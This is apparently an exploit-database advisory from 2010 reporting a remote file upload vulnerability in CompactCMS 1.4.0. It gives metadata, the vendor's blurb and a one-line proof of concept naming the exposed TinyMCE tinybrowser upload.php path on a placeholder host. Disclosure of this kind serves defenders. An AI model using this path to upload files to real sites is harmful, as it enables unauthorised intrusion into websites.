# title: CompactCMS 1.4.0 (tiny_mce) Remote File upload
# edb-id: 12613
# cve-id: ()
# osvdb-id: ()
# author: Itsecteam
# published: 2010-05-15
# verified: No
# download exploit code
# download n/a

view source
print?
################################################## ########
#title: CompactCMS 1.4.0 (tiny_mce) Remote File upload
#vendor: http://www.compactcms.nl/
################################################## ########
#author: Itsecteam
#email: bug@itsecteam.com
#website: http://www.itsecteam.com
#forum : http://forum.itsecteam.com
#original advisory: http://www.itsecteam.com/en/vulnerab...rability52.htm
#thanks: R3dm0v3, pejvak, am!rkh@n
################################################## ########

#description (by vendor):#################################
compactcms might just be the tenth cms you considered using for your website.
If that's true, ask yourself why you haven't found the right &@#&@#&@#&@#&@#&@#&@#
management
system just yet. CompactCMS is light-weight, truly efficient and fully
ajax loaded.

#poc:############################################# ########
http://site.com/admin/includes/tiny_mce/plugins/
tinybrowser/upload.php